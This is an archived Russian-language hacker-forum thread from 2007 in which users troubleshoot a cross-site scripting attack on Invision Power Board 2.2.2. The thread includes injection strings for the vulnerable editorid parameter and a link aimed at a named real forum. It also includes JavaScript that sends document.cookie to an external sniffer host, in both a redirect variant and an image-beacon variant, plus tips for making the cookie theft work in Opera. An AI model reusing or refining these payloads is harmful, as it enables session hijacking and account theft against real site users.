PDA

Просмотр полной версии : Xss в Ipb 2.2.2

Z0mbie!
15.08.2007, 12:46
под Ie Xss пашед....НО под оперой нет,чо делать??!!
ктнить подскажет?
inv
15.08.2007, 12:47
xss приведи с конкретным примером
Z0mbie!
15.08.2007, 12:55
//--></script><SCRIPT SRC=http://ccp.on.ufanet.ru/cc.js></SCRIPT>
отправляет куки. не пашет. сниффер s.netsec.ru.

//--></script><SCRIPT SRC=http://ccp.on.ufanet.ru/al.js></SCRIPT>
просто выводит алерт.пашет.

исходник cc.js
document.location="http://s.netsec.ru/CCCP.gif?"+document.cookie;
inv
15.08.2007, 12:58
конкретный пример это значит ссылка уязвимая сформированная тобой
Z0mbie!
15.08.2007, 13:03
/jscripts/folder_rte_files/module_table.php?editorid=//--></
script><SCRIPT SRC=></SCRIPT>//--></script><SCRIPT SRC=http://ccp.on.ufanet.ru/cc.js></SCRIPT>
----------------------------------------------------
module_table.php?editorid= - уязвимый скрипт.

//--></
script><SCRIPT SRC=></SCRIPT>//--></script><SCRIPT SRC=http://ccp.on.ufanet.ru/cc.js></SCRIPT>
вызывает скрипт сс.js каторый вызывает
document.location="http://s.netsec.ru/CCCP.gif?"+document.cookie;
и все ето хрень корректно работает под ие,но не пашет под оперой.
хотя алерт оперра выводит.
inv
15.08.2007, 13:05
Я тебя прошу дать ссылку чтобы я зашел по ней и посмотрел какой формируется код страницы ёмоё

в опере символы урлкодируются
Z0mbie!
15.08.2007, 13:07
щас.

http://ufagames.ru/forums//jscripts/folder_rte_files/module_email.php?editorid=//--></script><SCRIPT SRC=http://ccp.on.ufanet.ru/cc.js></SCRIPT>
inv
15.08.2007, 13:12
зашел в опере...кинуло на сниф,убери в совем скрипте передаресацию и просто сделай алерт(document.cookie)

проверь есть ли куки..
Z0mbie!
15.08.2007, 13:18
есть. alert(document.cookie); работает норм.
inv
15.08.2007, 13:21
в асю постучи так быстрее будет
4444107------------44
fremax
15.08.2007, 13:24
У меня такая же байда. Тока куки не приходят на снифф даже под ие.
Вот у меня есть документ html след. содержания -
<html>
<head><title>wf</title></head>
<body>
<?
SetCookie("blablabla", "slom's");
?>
<script language="JavaScript">img = new Image(); img.src = "http://s.netsec.ru/fremax.gif?"+document.cookie;</script>
<script language="JavaScript">alert(document.cookie);</script>
</body>
</html>
выскакивает пустой алерт. Хотя если посмотреть в браузере куки, то видно что они установились. Подскажите, в чем может быть проблема?
inv
15.08.2007, 13:26
попробуй сделать document.domain = 'главный домен.xxx'
надеюсь понятно
если нет в асю
Z0mbie!
15.08.2007, 13:27
в асю постучи так быстрее будет
4444107------------44
Э...хм,а поточнее номер?
fremax
15.08.2007, 13:29
Э...хм,а поточнее номер?
что не понятно, тире убери и все.
Z0mbie!
15.08.2007, 13:52
тему клосед. всем inv биг спс.